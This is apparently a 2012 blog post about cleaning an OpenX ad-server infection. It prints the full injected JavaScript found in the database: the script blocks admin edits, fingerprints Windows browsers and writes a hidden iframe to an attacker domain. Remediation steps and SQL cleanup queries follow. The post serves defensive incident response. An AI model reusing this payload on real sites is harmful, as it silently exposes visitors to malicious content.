14 March 2012

OpenX infection detected by Avast

We use OpenX to deliver ads on one of our sites, and started getting reports that the Avast! antivirus software was tagging our site as infected with js:Iframe-EV [Trj].

There was hardly any information out there about this particular bug, but it turned out that we were indeed infected. Avast pointed to the file ajs.php, which was the OpenX script delivering our ads. I didn't start to catch on until I googled ajs.php.

The file itself was fine: unchanged from the installed version. The infection had gotten into our server's OpenX database somehow.

Here's the code that was served with each ad:

<script type="text/javascript">
// Part 1: runs on every page the payload lands on. Blanks any form field
// named 'append' and disables any button named 'submitbutton', which are the
// field names of the OpenX banner-edit form, so an admin opening the banner
// sees an empty append box and cannot save over the injected code.
window.onload=function(){
  var aht=new Array();
  var aht=document.getElementsByTagName('*');
  for(var i=0;i<aht.length;i++){
    if(aht[i].name=='append'){aht[i].value='';}
    if(aht[i].name=='submitbutton'){aht[i].onclick=function(){return false;}}
  }
}
</script>
<noscript><style type="text/css">.code{display:none;}</style></noscript>
<script>
// Part 2: browser/OS fingerprinting. Only Firefox or Internet Explorer on
// Windows get the iframe; everyone else sees nothing.
var BrowserDetect = {
  init: function () {
    this.browser = this.searchString(this.dataBrowser) || "An unknown browser";
    this.version = this.searchVersion(navigator.userAgent) || this.searchVersion(navigator.appVersion) || "an unknown version";
    this.OS = this.searchString(this.dataOS) || "an unknown OS";
  },
  searchString: function (data) {
    for (var i=0;i<data.length;i++) {
      var dataString = data[i].string;
      var dataProp = data[i].prop;
      this.versionSearchString = data[i].versionSearch || data[i].identity;
      if (dataString) {
        if (dataString.indexOf(data[i].subString) != -1) return data[i].identity;
      } else if (dataProp) return data[i].identity;
    }
  },
  searchVersion: function (dataString) {
    var index = dataString.indexOf(this.versionSearchString);
    if (index == -1) return;
    return parseFloat(dataString.substring(index+this.versionSearchString.length+1));
  },
  dataBrowser: [
    { string: navigator.userAgent,subString: "Firefox",identity: "Firefox"},
    {string: navigator.userAgent,subString: "MSIE",identity: "Explorer",versionSearch: "MSIE"}
  ],
  dataOS : [{string: navigator.platform,subString: "Win",identity: "Windows"}]
};
// Cookie helpers: the 'geo_idn' cookie (1-day expiry) marks a browser that
// has already been served the iframe, so each victim gets it once a day.
function addCookie(szName,szValue,dtDaysExpires){
  var dtExpires = new Date();
  var dtExpiryDate = "";
  dtExpires.setTime(dtExpires.getTime()+dtDaysExpires*24*60*60*1000);
  dtExpiryDate=dtExpires.toGMTString();
  document.cookie=szName+"="+szValue+";expires="+dtExpiryDate;
}
function findCookie(szName){
  var i=0;var nStartPosition=0;var nEndPosition=0;var szCookieString=document.cookie;
  while (i<=szCookieString.length){
    nStartPosition=i;
    nEndPosition=nStartPosition+szName.length;
    if (szCookieString.substring(nStartPosition,nEndPosition)==szName){
      nStartPosition=nEndPosition+1;
      nEndPosition=document.cookie.indexOf(";",nStartPosition);
      if(nEndPosition<nStartPosition) nEndPosition=document.cookie.length;
      return document.cookie.substring(nStartPosition,nEndPosition);
      break;
    }
    i++;
  }
  return "";
}
BrowserDetect.init();
var szCookieString = document.cookie;
var boroda = BrowserDetect.browser;
var os = BrowserDetect.OS;
// The actual payload: a 1x1 iframe pointing at the attacker's domain.
if ( ((boroda == "Firefox" || boroda == "Explorer") && (os == "Windows")) && (findCookie('geo_idn')!='c48a765e4f75baeb85f0a755fc3ec09c') ) {
  addCookie("geo_idn","c48a765e4f75baeb85f0a755fc3ec09c",1);
  document.write('<iframe src="http://mixdomain.in/stream?1" name="Twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"></iframe>');
} else {}
</script>


It was in the 'append' column of several entries in the ox_banners table, and also in the same column in one of the ox_z_xxxxxxxxxx tables.

The fix was this:

  • upgraded OpenX from 2.8.7 to 2.8.8
  • zeroed out the files install.php and install-plugin.php
  • moved the directory plugins to a random new location (I'll delete it altogether if no problem associated with its absence arises)
  • set the column append equal to the empty string in every record of every table in which it appears (ox_banners, ox_zones, and all the ox_z_xxxxxxxxx tables)
  • restarted apache2

However, this infection takes many forms (google "ajs.php malware"), so don't take the above as being literally all you have to do. Check the prepend column too in the same tables. Check that no extra admin users have appeared.
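
The database clean-up and the admin-user check above, written out as MySQL queries against an OpenX 2.8 database. This is an added example, not code from the original post or from OpenX. The tables and columns the post names (ox_banners, ox_zones, the ox_z_* tables, append, prepend) come from the post; bannerid, and the ox_users, ox_accounts and ox_account_user_assoc tables with their account_type column, are assumptions from the OpenX 2.8 schema and should be checked against your own install. It goes a step further than the post by enumerating the tables from information_schema instead of naming the hashed ox_z_* tables by hand.

```sql
-- 1. Every table in this OpenX database that carries an append or prepend
--    column: ox_banners, ox_zones and the ox_z_* tables, whatever their
--    hashed names happen to be on your install.
SELECT table_name, column_name
FROM information_schema.columns
WHERE table_schema = DATABASE()
  AND column_name IN ('append', 'prepend');

-- 2. Look before wiping: which banners carry a script, an iframe, or the
--    domain from the payload above? (bannerid is the ox_banners primary
--    key in OpenX 2.8; assumed, check your schema.)
SELECT bannerid,
       LEFT(append, 80)  AS append_head,
       LEFT(prepend, 80) AS prepend_head
FROM ox_banners
WHERE append  LIKE '%<script%' OR append  LIKE '%<iframe%' OR append  LIKE '%mixdomain.in%'
   OR prepend LIKE '%<script%' OR prepend LIKE '%<iframe%' OR prepend LIKE '%mixdomain.in%';

-- 3. The post's fix: blank both columns in every row of the two known
--    tables. If you legitimately use append/prepend code, add a WHERE on
--    the markers from step 2 instead of wiping everything.
UPDATE ox_banners SET append = '', prepend = '';
UPDATE ox_zones   SET append = '', prepend = '';

-- 4. Generate the same UPDATE for every other table found in step 1 (the
--    ox_z_* tables). Run this SELECT, then execute the statements it
--    prints: a plain MySQL UPDATE cannot take its table name from a query.
SELECT CONCAT('UPDATE `', table_name, '` SET `', column_name, '` = \'\';') AS stmt
FROM information_schema.columns
WHERE table_schema = DATABASE()
  AND column_name IN ('append', 'prepend')
  AND table_name NOT IN ('ox_banners', 'ox_zones');

-- 5. Who holds an ADMIN account? Any user you did not create yourself is
--    suspect. (ox_users, ox_accounts, ox_account_user_assoc and the
--    account_type value 'ADMIN' are assumed from the OpenX 2.8 schema.)
SELECT u.user_id, u.username, u.email_address, u.date_created
FROM ox_users u
JOIN ox_account_user_assoc a ON a.user_id = u.user_id
JOIN ox_accounts acc         ON acc.account_id = a.account_id
WHERE acc.account_type = 'ADMIN'
ORDER BY u.date_created DESC;
```

Take a mysqldump of the database before running the UPDATEs, both so you can roll back and so you keep a copy of the payload for later comparison. As the post itself found, clearing the columns alone only buys a day if the entry point is still open: close that first, then clean the tables.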

Before I upgraded OpenX, I emptied out the same column, but the infection was back the next day. So there was a back door open somewhere. I hope that upgrading to 2.8.8 will have closed the back door, but it's hard to be sure.

From what I've seen, the route of infection is attackers taking advantage of the install.php or install-plugin.php file to upload a script of their own that writes into your OpenX database.

I wonder when software developers will stop being so naive -- but perhaps they are only naive in the open source version.
